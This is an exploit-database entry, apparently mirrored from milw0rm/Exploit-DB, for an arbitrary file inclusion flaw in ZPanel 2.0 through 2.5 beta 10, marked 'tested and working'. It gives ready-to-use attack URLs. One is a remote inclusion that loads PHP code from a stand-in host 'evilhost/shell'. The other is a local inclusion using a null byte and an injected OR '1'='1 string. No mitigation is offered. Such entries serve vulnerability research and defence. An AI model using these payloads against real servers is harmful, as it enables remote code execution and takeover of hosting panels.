header-logo
Suggest Exploit
vendor:
ZPanel
by:
milw0rm.com
7.5
CVSS
HIGH
Arbitrary File Inclusion
Unknown
CWE
Product Name: ZPanel
Affected Version From: ZPanel version 2.0
Affected Version To: ZPanel version 2.5 beta 10
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
2005

Arbitrary File Inclusion in ZPanel

It is possible to include arbitrary files in ZPanel version 2.0 and ZPanel version 2.5 beta 10. The exploit for version 2.0 involves accessing http://localhost/zpanel/zpanel.php?page=http://evilhost/shell, where http://evilhost/shell.php contains the malicious PHP code. The exploit for version 2.5 beta involves accessing http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1.

Mitigation:

Unknown
Source

Exploit-DB raw data:

# Tested and working /str0ke

It is possible to include arbitrary file:
local - in version ZPanel <= 2.5 beta 10,
remote - in ZPanel 2.0.

[exploit for v 2.0]
http://localhost/zpanel/zpanel.php?page=http://evilhost/shell
where http://evilhost/shell.php - evil php code script

[exploit for v 2.5 beta]
http://localhost/zpanel/zpanel.php?page=billinginfo/index.php%00'%20OR%20'1'='1


# milw0rm.com [2005-03-15]

Navigation

Suggest Exploit

Services By CQR